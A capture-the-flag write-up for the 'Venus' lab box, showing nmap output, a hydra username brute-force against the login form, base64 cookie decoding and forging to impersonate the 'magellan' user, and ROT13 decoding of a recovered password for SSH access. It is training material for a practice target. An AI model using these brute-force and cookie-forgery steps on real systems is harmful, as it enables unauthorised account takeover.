Venus

Last updated 2 years ago

Was this helpful?

Venus

Venus is described as a Medium box requiring more knowledge than Mercury.

└─$ nmap -A -vv 10.6.6.11 -Pn Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower. Starting Nmap 7.93 ( ) at 2022-11-13 15:11 PST NSE: Loaded 155 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 15:11 Completed NSE at 15:11, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 15:11 Completed NSE at 15:11, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 15:11 Completed NSE at 15:11, 0.00s elapsed Initiating Parallel DNS resolution of 1 host. at 15:11 Completed Parallel DNS resolution of 1 host. at 15:11, 0.00s elapsed Initiating Connect Scan at 15:11 Scanning venus.cyber.range (10.6.6.11) [1000 ports] Discovered open port 8080/tcp on 10.6.6.11 Discovered open port 22/tcp on 10.6.6.11 Completed Connect Scan at 15:11, 7.31s elapsed (1000 total ports) Initiating Service scan at 15:11 Scanning 2 services on venus.cyber.range (10.6.6.11) Completed Service scan at 15:13, 91.20s elapsed (2 services on 1 host) NSE: Script scanning 10.6.6.11. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 15:13 Completed NSE at 15:13, 0.15s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 15:13 Completed NSE at 15:13, 1.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 15:13 Completed NSE at 15:13, 0.00s elapsed Nmap scan report for venus.cyber.range (10.6.6.11) Host is up, received user-set (0.00088s latency). Scanned at 2022-11-13 15:11:22 PST for 100s Not shown: 985 filtered tcp ports (no-response), 13 filtered tcp ports (host-unreach) PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack OpenSSH 8.5 (protocol 2.0) | ssh-hostkey: | 256 b03e1c684a31327753e31089d6297850 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBB+dV9A80/dgYSig2NEBJYcoRe6VFus7DqjGWjNYjN4FH4e8scrM8P9zuw8EYJTdIjDVeJbersbscUbJTTH3C+w= | 256 fdb420d0d8da0267a4a548f346e2b90f (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEG7ONqJEC7HEEiTZaI+MemunphhJ23BhWM0eLlcL/BJ 8080/tcp open http-proxy syn-ack WSGIServer/0.2 CPython/3.9.5 |_http-server-header: WSGIServer/0.2 CPython/3.9.5 | fingerprint-strings: | GetRequest, HTTPOptions: | HTTP/1.1 200 OK | Date: Sun, 13 Nov 2022 23:11:34 GMT | Server: WSGIServer/0.2 CPython/3.9.5 | Content-Type: text/html; charset=utf-8 | X-Frame-Options: DENY | Content-Length: 626 | X-Content-Type-Options: nosniff | Referrer-Policy: same-origin | <html> | <head> | <title>Venus Monitoring Login</title> | <style> | .aligncenter { | text-align: center; | label { | display:block; | position:relative; | </style> | </head> | <body> | <h1> Venus Monitoring Login </h1> | <h2>Please login: </h2> | Credentials guest:guest can be used to access the guest account. | <form action="/" method="post"> | <label for="username">Username:</label> | <input id="username" type="text" name="username"> | <label for="password">Password:</label> | <input id="username" type="text" name="password"> | <input type="submit" value="Login"> | </form> | </body> |_ </html> |_http-title: Venus Monitoring Login | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at : SF-Port8080-TCP:V=7.93%I=7%D=11/13%Time=637179A8%P=x86_64-pc-linux-gnu%r(G SF:etRequest,363,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Sun,\x2013\x20Nov\x20 SF:2022\x2023:11:34\x20GMT\r\nServer:\x20WSGIServer/0\.2\x20CPython/3\.9\. SF:5\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nX-Frame-Options:\x SF:20DENY\r\nContent-Length:\x20626\r\nX-Content-Type-Options:\x20nosniff\ SF:r\nReferrer-Policy:\x20same-origin\r\n\r\n<html>\n<head>\n<title>Venus\ SF:x20Monitoring\x20Login</title>\n<style>\n\.aligncenter\x20{\n\x20\x20\x SF:20\x20text-align:\x20center;\n}\nlabel\x20{\n\x20\x20\x20\x20display:bl SF:ock;\n\x20\x20\x20\x20position:relative;\n}\n</style>\n</head>\n<body>\ SF:n<h1>\x20Venus\x20Monitoring\x20Login\x20</h1>\n<h2>Please\x20login:\x2 SF:0</h2>\nCredentials\x20guest:guest\x20can\x20be\x20used\x20to\x20access SF:\x20the\x20guest\x20account\.\n<form\x20action=\"/\"\x20method=\"post\" SF:>\n\x20\x20\x20\x20<br\x20/>\n\x20\x20\x20\x20<label\x20for=\"username\ SF:">Username:</label>\n\x20\x20\x20\x20<input\x20id=\"username\"\x20type= SF:\"text\"\x20name=\"username\">\n\x20\x20\x20\x20<br\x20/>\n\x20\x20\x20 SF:\x20<label\x20for=\"password\">Password:</label>\n\x20\x20\x20\x20<inpu SF:t\x20id=\"username\"\x20type=\"text\"\x20name=\"password\">\n\x20\x20\x SF:20\x20<br\x20/>\n\x20\x20\x20\x20<input\x20type=\"submit\"\x20value=\"L SF:ogin\">\n</form>\n\n</body>\n</html>\n")%r(HTTPOptions,363,"HTTP/1\.1\x SF:20200\x20OK\r\nDate:\x20Sun,\x2013\x20Nov\x202022\x2023:11:34\x20GMT\r\ SF:nServer:\x20WSGIServer/0\.2\x20CPython/3\.9\.5\r\nContent-Type:\x20text SF:/html;\x20charset=utf-8\r\nX-Frame-Options:\x20DENY\r\nContent-Length:\ SF:x20626\r\nX-Content-Type-Options:\x20nosniff\r\nReferrer-Policy:\x20sam SF:e-origin\r\n\r\n<html>\n<head>\n<title>Venus\x20Monitoring\x20Login</ti SF:tle>\n<style>\n\.aligncenter\x20{\n\x20\x20\x20\x20text-align:\x20cente SF:r;\n}\nlabel\x20{\n\x20\x20\x20\x20display:block;\n\x20\x20\x20\x20posi SF:tion:relative;\n}\n</style>\n</head>\n<body>\n<h1>\x20Venus\x20Monitori SF:ng\x20Login\x20</h1>\n<h2>Please\x20login:\x20</h2>\nCredentials\x20gue SF:st:guest\x20can\x20be\x20used\x20to\x20access\x20the\x20guest\x20accoun SF:t\.\n<form\x20action=\"/\"\x20method=\"post\">\n\x20\x20\x20\x20<br\x20 SF:/>\n\x20\x20\x20\x20<label\x20for=\"username\">Username:</label>\n\x20\ SF:x20\x20\x20<input\x20id=\"username\"\x20type=\"text\"\x20name=\"usernam SF:e\">\n\x20\x20\x20\x20<br\x20/>\n\x20\x20\x20\x20<label\x20for=\"passwo SF:rd\">Password:</label>\n\x20\x20\x20\x20<input\x20id=\"username\"\x20ty SF:pe=\"text\"\x20name=\"password\">\n\x20\x20\x20\x20<br\x20/>\n\x20\x20\ SF:x20\x20<input\x20type=\"submit\"\x20value=\"Login\">\n</form>\n\n</body SF:>\n</html>\n"); NSE: Script Post-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 15:13 Completed NSE at 15:13, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 15:13 Completed NSE at 15:13, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 15:13 Completed NSE at 15:13, 0.00s elapsed Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at . Nmap done: 1 IP address (1 host up) scanned in 100.01 seconds Ports 22 and 8080 are open.

A visit to the website shows a login page, and we can log in as guest.

This doesn't provide much, although the letters might be something useful.

dirb gave us a /admin directory and that is a Django login page.

If we try to login with the guest account other than guest we get “Invalid username” so lets try and find some users.

hydra -L /usr/share/wordlist/rockyou.txt -p pass -s 8080 10.6.6.11 http-post-form "/:username=^USER^&password^PASS^:Invalid username."

hydra returns a username of venus,guest and magellan. So lets try that with burp.

When we log into the guest account we get a Set-Cookie:

Which looks like base64.

echo 'Z3Vlc3Q6dGhyZmc=' | base64 -d guest:thrfg

When I entered venus:guest I got a different cookie.

echo 'dmVudXM6aXJhaGY=' | base64 -d venus:irahf

So if we take venus:irahf and change it to magellan:irahf encode it with base64 we get bWFnZWxsYW46aXJhaGYK Now we can use that in burp.

And we get a new set-cookie bWFnZWxsYW46aXJhaGZ2bmF0cmJ5YnRsMTk4OQ==

base64 again.

echo 'bWFnZWxsYW46aXJhaGZ2bmF0cmJ5YnRsMTk4OQ==' | base64 -d magellan:irahfvnatrbybtl1989

Now lets try and ssh with those credentials. Something seems weird with the password. Played around with cyberchef and found that it is ROT13 encoded. venusiangeology1989

Alright now that we got the userflag lets root this machine.

PreviousMercury NextEarth

Last updated 2 years ago

Was this helpful?